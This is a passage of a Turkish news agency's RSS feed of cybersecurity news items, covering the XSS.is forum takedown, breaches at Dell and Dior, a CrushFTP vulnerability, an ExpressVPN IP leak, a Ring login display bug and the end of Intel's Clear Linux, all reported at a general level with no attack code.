                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6881d0b45c3b5.webp" length="89146" type="image/webp"/>
            
            <pubDate>Thu, 24 Jul 2025 09:21:08 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>xss forumu neden kapatıldı, operasyon hangi ülkelerin iş birliğiyle yapıldı, forum yöneticisi ne kadar gelir elde etti, kapatma siber suç dünyasını nasıl etkileyecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h1 style="color: #b30000; font-size: 2.2em; margin-bottom: 0.6em;">XSS.is Forumu Kapatıldı: Uluslararası Operasyonla Yakalandı</h1>
<p style="margin-bottom: 1.2em;">Uluslararası iş birliğiyle yürütülen bir operasyon kapsamında, dünyanın en büyük Rusça konuşulan siber suç forumlarından biri olan <strong>XSS.is</strong> kapatıldı. Forumun yöneticisi, <strong>22 Temmuz 2025</strong> tarihinde Ukrayna'nın başkenti <strong>Kiev</strong>'de yakalandı. Operasyon, Fransız polisi, Ukrayna makamları ve Europol'ün ortak çalışmasıyla gerçekleştirildi.</p>
<h2 style="color: #333; font-size: 1.6em; margin-top: 2em;">4 Yıllık Soruşturma Süreci</h2>
<p style="margin-bottom: 1.2em;">Paris Emniyet Müdürlüğü Siber Suç Birimi tarafından <strong>2 Temmuz 2021</strong> tarihinde başlatılan kapsamlı soruşturma sonucunda forumun faaliyetlerine dair çok sayıda veri toplandı. Fransız kolluk kuvvetleri, XSS forumuyla bağlantılı olan <em>thesecure.biz</em> adlı Jabber sunucusu üzerinden iletişimleri takip etti. Bu takip sonucunda yakalanan kişinin, çok sayıda yasa dışı siber suç ve fidye yazılımı operasyonuyla bağlantılı olduğu belirlendi.</p>
<h2 style="color: #333; font-size: 1.6em; margin-top: 2em;">Forumun Geçmişi ve Rolü</h2>
<p style="margin-bottom: 1.2em;"><strong>2013</strong> yılında <em>DaMaGeLab</em> adıyla kurulan ve <strong>2018</strong>'de <strong>XSS.is</strong> ismini alan platform, siber suç dünyasında köklü bir geçmişe sahipti. 50 binden fazla kayıtlı kullanıcısıyla XSS.is, kötü amaçlı yazılım satışı, sistemlere izinsiz erişim, çalıntı veri ticareti ve fidye yazılım hizmetleri gibi faaliyetlerin merkezi konumundaydı. Ayrıca forum, şifreli Jabber sunucusu üzerinden siber suçlular arasında anonim iletişim imkânı da sunuyordu.</p>
<h2 style="color: #333; font-size: 1.6em; margin-top: 2em;">Mali Boyut ve Yasal Süreç</h2>
<p style="margin-bottom: 1.2em;">Europol tarafından yapılan açıklamaya göre, gözaltına alınan şüphelinin forum üzerinden <strong>7 milyon euro</strong>dan fazla gelir elde ettiği belirlendi. Şüphelinin sadece teknik altyapıyı yönetmediği, aynı zamanda suçlular arası anlaşmazlıkları çözdüğü ve işlemlerin güvenliğini sağladığı kaydedildi.</p>
<p style="margin-bottom: 1.2em;">Şüpheli hakkında <strong>9 Kasım 2021</strong> tarihinde “veri işleme sistemlerine yönelik saldırılara yardım ve yataklık”, “örgütlü gasp” ve “suç örgütü üyeliği” suçlamalarıyla yasal işlem başlatıldı. Bu operasyon, karanlık ağ üzerindeki benzer platformlara yönelik süren uluslararası baskının bir parçası olarak değerlendiriliyor.</p>
<h2 style="color: #333; font-size: 1.6em; margin-top: 2em;">Kapanmanın Etkisi</h2>
<p style="margin-bottom: 1.2em;">Uzmanlara göre, geniş kullanıcı kitlesine sahip XSS.is gibi yerleşik platformların kapatılması, siber suç ekosisteminde ciddi boşluklara neden olabilir. Bu gelişme, karanlık ağda faaliyet gösteren suç ağlarına yönelik uluslararası iş birliğinin önemini bir kez daha ortaya koydu.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dell, World Leaks Grubu Tarafından Hedef Alınan Test Platformundaki İhlali Doğruladı</title>
            <link>https://cumha.com.tr/dell-world-leaks-grubu-tarafindan-hedef-alinan-test-platformundaki-ihlali-dogruladi</link>
            <guid>https://cumha.com.tr/dell-world-leaks-grubu-tarafindan-hedef-alinan-test-platformundaki-ihlali-dogruladi</guid>
            <description><![CDATA[ Dell, ticari müşterilere ürün tanıtımı yapmak üzere kullanılan Solution Centers platformunun siber saldırıya uğradığını ve sızıntının World Leaks adlı gasp grubunca gerçekleştirildiğini açıkladı. Şirket, sızdırılan verilerin büyük kısmının sahte veya test verisi olduğunu belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ac0902bc4.webp" length="51406" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 12:10:21 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>World Leaks hangi Dell platformunu hedef aldı, sızdırılan veriler ne tür bilgileri içeriyor, saldırıda gerçek müşteri verileri ele geçirildi mi, World Leaks grubu daha önce hangi saldırılarda yer aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="400" data-end="703">Teknoloji şirketi Dell, World Leaks adlı gasp grubunun, firmanın "Customer Solution Centers" adlı ürün tanıtım platformuna yetkisiz erişim sağladığını doğruladı. 2025 Temmuz ayı başında gerçekleşen saldırı sonrası, tehdit aktörü sızdırdığı verilerin bir kısmını kamuoyuyla paylaştı.</p>
<p data-start="705" data-end="977">Dell tarafından BleepingComputer’a yapılan açıklamada, saldırıya uğrayan ortamın şirketin müşterilerine ürün ve çözüm tanıtımı yaptığı, ticari amaçlı yapılandırılmış bir gösterim ortamı olduğu ve gerçek müşteri sistemleri ile doğrudan bağlantısının bulunmadığı vurgulandı.</p>
<p data-start="979" data-end="1220">Şirket, sızdırılan verilerin büyük bölümünün sahte veri setleri, genel erişime açık test verileri ve sistem çıktılarından oluştuğunu ifade etti. Buna ek olarak, gerçek olduğu doğrulanan tek verinin eski bir iletişim listesi olduğu açıklandı.</p>
<p data-start="1222" data-end="1609"><strong data-start="1222" data-end="1268">Veriler sızdırıldı, şifreler tespit edildi</strong><br data-start="1268" data-end="1271">World Leaks, saldırıya ilişkin yaklaşık 1,3 terabaytlık veriyi elde ettiğini öne sürerek bir kısmını sızdırdı. Yayınlanan verilerde ağırlıklı olarak yapılandırma betikleri, sistem yedekleri ve çeşitli BT uygulamalarına ait veriler bulunuyor. Bazı dosyalarda, ekipman kurulumunda kullanılan iç sistem şifrelerinin de yer aldığı belirlendi.</p>
<p data-start="1611" data-end="1740">Dell, saldırının nasıl gerçekleştiğine ve fidye taleplerine dair ayrıntı vermediğini, olayın hala incelenmekte olduğunu bildirdi.</p>
<p data-start="1742" data-end="2097"><strong data-start="1742" data-end="1793">Hunters International’dan World Leaks’e dönüşüm</strong><br data-start="1793" data-end="1796">World Leaks grubu, 2023 sonunda başlatılan ve daha önce Hive fidye yazılımıyla bağlantılı olduğu değerlendirilen Hunters International adlı grubun yeniden markalanmış hali olarak biliniyor. Grup, 2025 başında ransomware yerine sadece veri gaspı yöntemine odaklanacağını duyurarak ismini değiştirmişti.</p>
<p data-start="2099" data-end="2475">Bu tarihten itibaren World Leaks, 49 farklı kuruluşun verilerini kamuya açık internet sitelerinde yayımladı. Grup, son dönemde SonicWall SMA 100 cihazlarındaki güvenlik açıklarını da kullanarak bazı kurumlara özel rootkit araçlarıyla erişim sağladı. Macnica'dan tehdit araştırmacısı Yutaka Sejiyama, yayımlanan 46 kuruluştan 10’unun söz konusu cihazları kullandığını belirtti.</p>
<p data-start="2477" data-end="2594">World Leaks şu an itibarıyla Dell'i resmi sızıntı listesine eklemiş değil. Ancak veriler kamuoyuna açılmaya başlandı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>1.000'den Fazla CrushFTP Sunucusu Kritik Açık Nedeniyle Ele Geçirilmeye Açık Durumda</title>
            <link>https://cumha.com.tr/1000den-fazla-crushftp-sunucusu-kritik-acik-nedeniyle-ele-gecirilmeye-acik-durumda</link>
            <guid>https://cumha.com.tr/1000den-fazla-crushftp-sunucusu-kritik-acik-nedeniyle-ele-gecirilmeye-acik-durumda</guid>
            <description><![CDATA[ CVE-2025-54309 kodlu güvenlik açığı, dünya genelinde 1.000’i aşkın CrushFTP sunucusunu saldırılara karşı savunmasız bırakıyor. Etkili önlemler almayan kullanıcılar, yönetici erişimi dahil olmak üzere ciddi risklerle karşı karşıya. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880afc6bd9d6.webp" length="53348" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 12:10:19 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-54309 açığı hangi sistemleri etkiliyor, güncelleme yapmayan CrushFTP sunucuları hangi risklerle karşı karşıya, Shadowserver taramaları ne gösterdi, Clop grubu hangi saldırılarda yer aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="349" data-end="715">CrushFTP yazılımında tespit edilen kritik güvenlik açığı (CVE-2025-54309), internete açık durumda bulunan 1.000’i aşkın sunucunun kötü niyetli kişilerce ele geçirilmesine neden olabilecek saldırıların önünü açtı. Açığın, AS2 doğrulamasının hatalı işlenmesinden kaynaklandığı ve 10.8.5 ile 11.3.4_23 altındaki tüm sürümleri etkilediği bildirildi.</p>
<p data-start="717" data-end="987">CrushFTP tarafından yapılan açıklamada, söz konusu güvenlik zafiyetinin 18 Temmuz 2025 tarihinde aktif olarak istismar edildiği ve saldırganların yazılım kodunu tersine mühendislik yöntemiyle analiz ederek daha önce düzeltilmiş olan bir hatayı hedef aldığı ifade edildi.</p>
<p data-start="989" data-end="1325"><strong data-start="989" data-end="1036">"Güncelleme yapan kullanıcılar etkilenmedi"</strong><br data-start="1036" data-end="1039">Şirket, açık nedeniyle yalnızca güncellemelerini yapmayan sistemlerin hedef alındığını, en güncel sürümü kullanan sunucuların bu açıklardan etkilenmediğini vurguladı. Ayrıca, ana sunucudan izole şekilde yapılandırılan DMZ (Demilitarized Zone) sistemlerinin de güvende olduğu bildirildi.</p>
<p data-start="1327" data-end="1554">Kullanıcılara, yükleme ve indirme günlüklerinin şüpheli etkinlikler açısından incelenmesi, otomatik güncellemelerin aktif hale getirilmesi ve yönetim paneline yalnızca izinli IP adreslerinden erişim sağlanması tavsiye ediliyor.</p>
<p data-start="1556" data-end="1868"><strong data-start="1556" data-end="1602">Shadowserver: 1.040 sunucu hala savunmasız</strong><br data-start="1602" data-end="1605">Siber tehdit izleme platformu Shadowserver’ın gerçekleştirdiği taramalara göre, dünya genelinde yaklaşık 1.040 CrushFTP sunucusu hala söz konusu açıklara karşı yamalanmamış durumda. Shadowserver, bu sunucuların yöneticilerini bilgilendirmeye başladığını açıkladı.</p>
<p data-start="1870" data-end="2096">Saldırıların veri hırsızlığı mı yoksa kötü amaçlı yazılım yükleme amaçlı mı olduğu henüz netleşmemiş olsa da, son yıllarda yönetilen dosya transfer yazılımları fidye yazılım gruplarının öncelikli hedefleri arasında yer alıyor.</p>
<p data-start="2098" data-end="2359"><strong data-start="2098" data-end="2151">Clop grubu benzer sistemleri daha önce hedef aldı</strong><br data-start="2151" data-end="2154">Clop adlı siber suç grubu, daha önce Accelion FTA, GoAnywhere MFT, MOVEit Transfer ve Cleo yazılımında bulunan sıfırıncı gün açıklarını kullanarak geniş çaplı veri hırsızlığı saldırıları gerçekleştirmişti.</p>
<p data-start="2361" data-end="2551">CrushFTP, Nisan 2024'te CVE-2024-4040 kodlu başka bir sıfır gün açığını kapatmış, o dönemde saldırıların ABD’deki bazı kurumları hedef aldığı ve siyasi amaçlı olabileceği değerlendirilmişti.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dior ABD'deki Müşterilerine Veri İhlali Bildirimi Göndermeye Başladı</title>
            <link>https://cumha.com.tr/dior-abddeki-musterilerine-veri-ihlali-bildirimi-goendermeye-basladi</link>
            <guid>https://cumha.com.tr/dior-abddeki-musterilerine-veri-ihlali-bildirimi-goendermeye-basladi</guid>
            <description><![CDATA[ Fransız lüks moda markası Dior, Ocak ayında yaşanan ve ancak Mayıs ayında fark edilen siber saldırı sonrası, ABD&#039;deki müşterilerinin kişisel bilgilerinin sızdırıldığını doğruladı. Şirket, mağdur kullanıcılar için 24 aylık kimlik koruma hizmeti sunuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880af8eeaece.webp" length="57138" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 12:10:17 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Dior veri ihlalinden kimler etkilendi, hangi kişisel bilgiler sızdırıldı, ShinyHunters saldırısı hangi markaları hedef aldı, kimlik koruma hizmeti nasıl alınacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="355" data-end="594">Fransız lüks moda evi Dior, 26 Ocak 2025 tarihinde gerçekleşen ancak 7 Mayıs 2025'te tespit edilen bir siber güvenlik ihlalinin ardından, ABD'deki müşterilerine yönelik veri sızıntısı bildirimlerini göndermeye başladı.</p>
<p data-start="596" data-end="882">Dior tarafından gönderilen bilgilendirme mektuplarında, saldırının şirketin müşteri bilgilerini barındıran bir veritabanına yönelik olduğu ifade edildi. Yapılan iç inceleme sonucunda, yetkisiz bir kişinin veritabanına erişim sağladığı ve bazı kişisel bilgileri ele geçirdiği belirtildi.</p>
<p data-start="884" data-end="950">Sızdırılan bilgiler arasında şu verilerin yer aldığı bildirildi:</p>
<ul data-start="951" data-end="1125">
<li data-start="951" data-end="961">
<p data-start="953" data-end="961">Tam ad</p>
</li>
<li data-start="962" data-end="984">
<p data-start="964" data-end="984">İletişim bilgileri</p>
</li>
<li data-start="985" data-end="1003">
<p data-start="987" data-end="1003">Fiziksel adres</p>
</li>
<li data-start="1004" data-end="1020">
<p data-start="1006" data-end="1020">Doğum tarihi</p>
</li>
<li data-start="1021" data-end="1078">
<p data-start="1023" data-end="1078">Pasaport veya resmi kimlik numarası (bazı durumlarda)</p>
</li>
<li data-start="1079" data-end="1125">
<p data-start="1081" data-end="1125">Sosyal güvenlik numarası (bazı durumlarda)</p>
</li>
</ul>
<p data-start="1127" data-end="1271">Şirket, banka veya kredi kartı bilgisi gibi finansal verilerin ele geçirilmediğini ve bu bilgilerin sızan veritabanında yer almadığını açıkladı.</p>
<p data-start="1273" data-end="1513"><strong data-start="1273" data-end="1308">Kimlik koruma hizmeti sunuluyor</strong><br data-start="1308" data-end="1311">Dior, etkilenen kişilere yönelik olarak iki yıl süreyle geçerli olan ücretsiz kredi izleme ve kimlik hırsızlığı koruma hizmeti sunduğunu ve bu hizmete 31 Ekim 2025’e kadar kayıt olunabileceğini duyurdu.</p>
<p data-start="1515" data-end="1875"><strong data-start="1515" data-end="1554">Olay daha önce Asya’da duyurulmuştu</strong><br data-start="1554" data-end="1557">Söz konusu veri ihlalinin tarihi, Dior’un daha önce Güney Kore ve Çin'de yaşanan bir güvenlik olayına dair yaptığı açıklamayla örtüşüyor. Aynı dönemde, LVMH grubuna ait başka bir marka olan Louis Vuitton da Birleşik Krallık, Güney Kore ve Türkiye'deki müşterilerini etkileyen benzer bir saldırıyı kamuoyuna duyurmuştu.</p>
<p data-start="1877" data-end="2162">BleepingComputer tarafından edinilen bilgilere göre, Dior ve Louis Vuitton’a yönelik siber saldırılar aynı zincirin parçası. Saldırının, bir üçüncü taraf satıcının veritabanı üzerinden erişim sağlayan ShinyHunters adlı siber suç grubu tarafından gerçekleştirildiği değerlendiriliyor.</p>
<p data-start="2164" data-end="2337">Henüz Dior’dan ABD’de kaç müşterinin etkilendiğine dair bir açıklama yapılmazken, LVMH çatısı altındaki diğer markaların da benzer bildirimlerde bulunabileceği belirtiliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ExpressVPN, RDP oturumlarında IP adreslerini sızdıran hatayı düzeltti: Kullanıcılar yeni sürüme geçmeli</title>
            <link>https://cumha.com.tr/expressvpn-rdp-oturumlarinda-ip-adreslerini-sizdiran-hatayi-duzeltti-kullanicilar-yeni-surume-gecmeli</link>
            <guid>https://cumha.com.tr/expressvpn-rdp-oturumlarinda-ip-adreslerini-sizdiran-hatayi-duzeltti-kullanicilar-yeni-surume-gecmeli</guid>
            <description><![CDATA[ Dünyanın en popüler VPN hizmetlerinden biri olan ExpressVPN, Windows istemcisinde tespit edilen bir hata nedeniyle Uzak Masaüstü Protokolü (RDP) trafiğinin VPN tünelini atlayarak kullanıcıların gerçek IP adreslerini sızdırabildiğini doğruladı. Şirket, güvenlik açığını gideren güncellemeyi Haziran ayında yayımladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880af34045cf.webp" length="53578" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:52:03 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ExpressVPN’deki hata hangi kullanıcıları etkiledi, IP sızıntısı nasıl gerçekleşti, sorun hangi sürümle düzeltildi, şirket gelecekte benzer hataları nasıl önleyecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="475" data-end="478">ExpressVPN, Windows uygulamasında tespit edilen ve kullanıcıların gerçek IP adreslerinin RDP bağlantıları sırasında sızmasına neden olan bir güvenlik açığını kapattığını duyurdu. VPN servisinin temel işlevlerinden biri olan IP adresini gizleme özelliğini devre dışı bırakan bu hata, özellikle uzak masaüstü bağlantısı kuran kullanıcıları etkiledi.</p>
<p></p>
<p data-start="827" data-end="1129">Açık, 25 Nisan 2025 tarihinde "Adam-X" takma adlı bir güvenlik araştırmacısı tarafından <strong data-start="915" data-end="946">ExpressVPN’in ödül programı</strong> kapsamında rapor edildi. Şirketin açıklamasına göre sorun, dahili testler için kullanılan debug kodlarının yanlışlıkla üretim (production) sürümlerine dâhil edilmesinden kaynaklandı.</p>
<p data-start="1131" data-end="1161"><strong data-start="1131" data-end="1159">Hangi sürümler etkilendi</strong></p>
<ul data-start="1162" data-end="1324">
<li data-start="1162" data-end="1237">
<p data-start="1164" data-end="1237">Hata, <strong data-start="1170" data-end="1205">sürüm 12.97 ile 12.101.0.2-beta</strong> arasındaki yapıları etkiledi.</p>
</li>
<li data-start="1238" data-end="1324">
<p data-start="1240" data-end="1324"><strong data-start="1240" data-end="1252">Düzeltme</strong>, <strong data-start="1254" data-end="1269">12.101.0.45</strong> numaralı sürümle 18 Haziran 2025 tarihinde yayımlandı.</p>
</li>
</ul>
<p data-start="1326" data-end="1601"><strong data-start="1326" data-end="1361">Şirketin açıklaması şu şekilde:</strong><br data-start="1361" data-end="1364">“Bir kullanıcı RDP bağlantısı kurduğunda, bu trafik VPN tünelini atlayarak doğrudan yönlendirilmiş olabilir. Bu durum şifrelemeyi etkilememiş olsa da, bağlantının VPN üzerinden değil doğrudan gerçekleştiği gözlemlenebilir hâle gelmişti.”</p>
<p data-start="1603" data-end="1826">Bu hata, özellikle aynı yerel ağda bulunanlar veya internet servis sağlayıcıları tarafından RDP sunucusuna yapılan bağlantının fark edilmesine neden olabiliyordu. Normalde bu tür bilgiler VPN tüneli içinde gizli kalmalıydı.</p>
<p data-start="1828" data-end="2155"><strong data-start="1828" data-end="1866">Etki sınırlı ancak dikkat edilmeli</strong><br data-start="1866" data-end="1869">ExpressVPN, hatanın yalnızca RDP (port 3389) kullanan kullanıcıları etkilediğini ve bu protokolün genellikle bireysel kullanıcılar yerine kurumsal ya da teknik personel tarafından tercih edildiğini belirtti. Bu nedenle, genel kullanıcı kitlesi açısından riskin düşük olduğu savunuluyor.</p>
<p data-start="2157" data-end="2284">Yine de şirket, tüm Windows kullanıcılarına <strong data-start="2201" data-end="2216">12.101.0.45</strong> sürümüne geçmelerini ve güncellemeleri geciktirmemelerini öneriyor.</p>
<p data-start="2286" data-end="2469"><strong data-start="2286" data-end="2312">Yeni önlemler alınacak</strong><br data-start="2312" data-end="2315">ExpressVPN, benzer sorunların tekrar yaşanmaması için üretim sürecindeki otomasyon kontrollerini ve geliştirme test süreçlerini güçlendireceğini bildirdi.</p>
<p data-start="2471" data-end="2646">Şirket, geçen yıl da <strong data-start="2492" data-end="2562">Windows istemcisindeki split tunneling özelliğinde DNS sızıntısına</strong> yol açan başka bir sorun nedeniyle geçici olarak bu özelliği devre dışı bırakmıştı.</p>
<p data-start="2648" data-end="2828"><strong data-start="2648" data-end="2660"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ring, şüpheli giriş raporlarına rağmen ihlali reddetti: Hatalı güncelleme, eski cihazları yeni gibi gösterdi</title>
            <link>https://cumha.com.tr/ring-supheli-giris-raporlarina-ragmen-ihlali-reddetti-hatali-guncelleme-eski-cihazlari-yeni-gibi-goesterdi</link>
            <guid>https://cumha.com.tr/ring-supheli-giris-raporlarina-ragmen-ihlali-reddetti-hatali-guncelleme-eski-cihazlari-yeni-gibi-goesterdi</guid>
            <description><![CDATA[ Amazon’a ait güvenlik kamerası hizmeti Ring, 28 Mayıs’ta kullanıcıların hesaplarında tanımadıkları cihazları ve IP adreslerini görmesine neden olan olayla ilgili ihlâl iddialarını reddetti. Şirket, bunun bir arka uç (backend) güncelleme hatasından kaynaklandığını savunuyor. Ancak kullanıcılar, açıklamadan tatmin olmuş değil. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880aee319338.webp" length="36576" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:59 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Ring kullanıcıları neden tanımadıkları girişler gördü, bu olay gerçek bir veri ihlali mi, Amazon’un açıklamaları kullanıcıları neden tatmin etmiyor, hesap güvenliği için hangi adımlar atılmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="491" data-end="494">Amazon'un sahip olduğu güvenlik kamerası markası <strong data-start="543" data-end="551">Ring</strong>, 28 Mayıs 2025 tarihinde birçok kullanıcının hesaplarında tanımadıkları cihazlara ve konumlara ait girişler görmesi üzerine ihlal şüphesiyle karşı karşıya kaldı. Ancak şirket, yaşananların bir siber saldırı değil, sistemsel bir hata olduğunu iddia ediyor.</p>
<p></p>
<p data-start="809" data-end="1003">Ring’in açıklamasına göre, yaşanan durum bir <strong data-start="854" data-end="878">arka uç güncellemesi</strong> sırasında <strong data-start="889" data-end="907">Control Center</strong> ekranında cihaz bilgilerini ve giriş tarihlerini yanlış gösteren bir yazılım hatasından ibaret.</p>
<p data-start="1005" data-end="1296"><strong data-start="1005" data-end="1059">Şirketin resmi açıklamasında şu ifadeler yer aldı:</strong><br data-start="1059" data-end="1062">“Control Center’da bilgilerin yanlış görüntülenmesine neden olan bir sorun tespit ettik. Bu durum, arka uç sistemde yapılan bir güncellemenin sonucudur. Müşteri hesaplarına yetkisiz erişim olduğuna dair herhangi bir nedenimiz yoktur.”</p>
<p data-start="1298" data-end="1565">Ancak kullanıcılar, açıklamanın tatmin edici olmadığını savunuyor. Özellikle İngiltere, İspanya ve Kanada gibi ülkelerden gelen giriş kayıtlarını ve bilinmeyen cihaz adlarını ekran görüntüleriyle paylaşan kullanıcılar, bunların eski girişler olamayacağını ifade etti.</p>
<p data-start="1567" data-end="1912"><strong data-start="1567" data-end="1613">Kullanıcı tepkileri sosyal medyada büyüyor</strong><br data-start="1613" data-end="1616">Bir kullanıcı, “Ben Derbhille kim bilmiyorum, onun iPhone’u neden benim Ring hesabımda görünüyor?” diyerek Ring’in “sadece bir hata” açıklamasına tepki gösterdi. Başka bir kullanıcı ise, "Hiç gitmediğim İspanya'dan giriş görünüyor. Bu nasıl sadece eski bir oturum olabilir?" ifadelerini kullandı.</p>
<p data-start="1914" data-end="2248"><strong data-start="1914" data-end="1970">Canlı izleme ve MFA şikayetleri endişeleri artırıyor</strong><br data-start="1970" data-end="1973">Bazı kullanıcılar, uygulamada <strong data-start="2003" data-end="2031">canlı izleme (live view)</strong> etkinlikleri görüldüğünü ancak kendilerinin o saatlerde uygulamayı açmadıklarını belirtti. Ayrıca, yeni cihazlar eklendiğinde çok faktörlü kimlik doğrulama (MFA) uyarısı almadıklarını rapor eden kullanıcılar da oldu.</p>
<p data-start="2250" data-end="2582">Amazon, 22 Temmuz’da BleepingComputer’a yaptığı açıklamada tekrar "bu durumun kullanıcıların hesap güvenliğini tehlikeye atan bir ihlal olmadığını" söyledi. Şirket sözcüsü, kullanıcıların daha önce giriş yaptığı cihazlar, paylaşılan hesap erişimleri ve artık kullanılmayan cihazların sistemde görünmeye devam edebileceğini belirtti.</p>
<p data-start="2584" data-end="2905"><strong data-start="2584" data-end="2604">Ring ne öneriyor</strong><br data-start="2604" data-end="2607">Kullanıcılara, Ring uygulamasında <strong data-start="2641" data-end="2687">Control Center &gt; Authorized Client Devices</strong> bölümünden yetkilendirilmiş cihazları kontrol etmeleri, tanımadıkları cihazları kaldırmaları ve hesap şifresini değiştirmeleri önerildi. Ayrıca, iki faktörlü kimlik doğrulamanın (2FA) etkinleştirilmesi tavsiye edildi.</p>
<p data-start="2907" data-end="3116"><strong data-start="2907" data-end="2919"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Intel, Clear Linux işletim sistemini sonlandırdı: Güvenlik yamaları durdu, GitHub deposu arşive alındı</title>
            <link>https://cumha.com.tr/intel-clear-linux-isletim-sistemini-sonlandirdi-guvenlik-yamalari-durdu-github-deposu-arsive-alindi</link>
            <guid>https://cumha.com.tr/intel-clear-linux-isletim-sistemini-sonlandirdi-guvenlik-yamalari-durdu-github-deposu-arsive-alindi</guid>
            <description><![CDATA[ Intel’in kendi donanımları için yüksek performans odaklı olarak geliştirdiği açık kaynaklı Clear Linux projesi resmen sona erdi. Güncellemelerin ve güvenlik yamalarının durdurulduğu duyurulurken, kullanıcıların vakit kaybetmeden başka dağıtımlara geçmeleri öneriliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_6880ae85d8697.webp" length="30668" type="image/webp"/>
            
            <pubDate>Wed, 23 Jul 2025 11:51:57 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Clear Linux projesi neden sonlandırıldı, kullanıcılar ne yapmalı, hangi riskler oluşabilir, Intel Linux katkılarına devam edecek mi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Intel, yaklaşık 10 yıldır geliştirmekte olduğu açık kaynaklı işletim sistemi <strong data-start="503" data-end="521">Clear Linux OS</strong> projesinin sona erdiğini duyurdu. Şirket, Clear Linux’un artık güncelleme veya güvenlik yaması almayacağını ve GitHub üzerindeki kaynak kodlarının <strong data-start="669" data-end="696">salt okunur (read-only)</strong> modda arşivlendiğini açıkladı.</p>
<p data-start="729" data-end="981">Clear Linux, Intel donanımlarında yüksek verimlilik sağlamak üzere özel olarak optimize edilen, modüler ve minimalist yapıya sahip bir Linux dağıtımıydı. Özellikle yazılım geliştiriciler, sunucu yöneticileri ve performans tutkunları için tasarlanmıştı.</p>
<p data-start="983" data-end="1304"><strong data-start="983" data-end="1041">Intel’den yapılan açıklamada şu ifadelere yer verildi:</strong><br data-start="1041" data-end="1044">“Bugünden itibaren Intel, Clear Linux OS için herhangi bir güvenlik yaması, güncelleme veya bakım hizmeti sunmayacaktır. Kullanıcıların, güvenlik ve kararlılık açısından aktif olarak sürdürülen başka bir Linux dağıtımına geçiş yapmaları önemle tavsiye edilir.”</p>
<p data-start="1306" data-end="1651"><strong data-start="1306" data-end="1359">Kapanış gerekçesi net değil ancak işaretler belli</strong><br data-start="1359" data-end="1362">Intel, projenin neden sona erdirildiğine dair resmi bir gerekçe paylaşmadı. Ancak, düşük kullanıcı ilgisi, özel paket ve güncelleme sistemi nedeniyle yüksek mühendislik maliyeti ve Intel’in stratejik kaynaklarını daha verimli projelere yöneltme politikası bu kararda etkili olmuş olabilir.</p>
<p data-start="1653" data-end="1846">Clear Linux, başka bir dağıtımdan türetilmediği için bağımsız bir altyapıya sahipti. Bu durum, her bileşenin sıfırdan yönetilmesini gerektiriyor ve önemli mühendislik kaynakları talep ediyordu.</p>
<p data-start="1848" data-end="2137"><strong data-start="1848" data-end="1887">Intel, Linux katkılarını sürdürecek</strong><br data-start="1887" data-end="1890">Intel, Clear Linux projesini sonlandırsa da Linux ekosistemine olan katkılarının süreceğini belirtti. Şirket, Intel donanımları için geliştirilen optimizasyonların, diğer Linux dağıtımlarına ve açık kaynak projelere entegre edileceğini ifade etti.</p>
<p data-start="2139" data-end="2417"><strong data-start="2139" data-end="2179">Kullanıcılar için acil geçiş önerisi</strong><br data-start="2179" data-end="2182">Clear Linux kullananlara, sistemlerinin kısa süre içinde bilinen güvenlik açıklarına karşı savunmasız kalabileceği uyarısı yapıldı. Bu nedenle, kullanıcıların hızlı bir şekilde başka bir aktif Linux dağıtımına geçiş yapması öneriliyor.</p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft, SharePoint saldırılarını Çin bağlantılı hacker gruplarına bağladı: ToolShell istismar zinciriyle dünya genelinde onlarca kurum hedef alındı</title>
            <link>https://cumha.com.tr/microsoft-sharepoint-saldirilarini-cin-baglantili-hacker-gruplarina-bagladi-toolshell-istismar-zinciriyle-dunya-genelinde-onlarca-kurum-hedef-alindi</link>
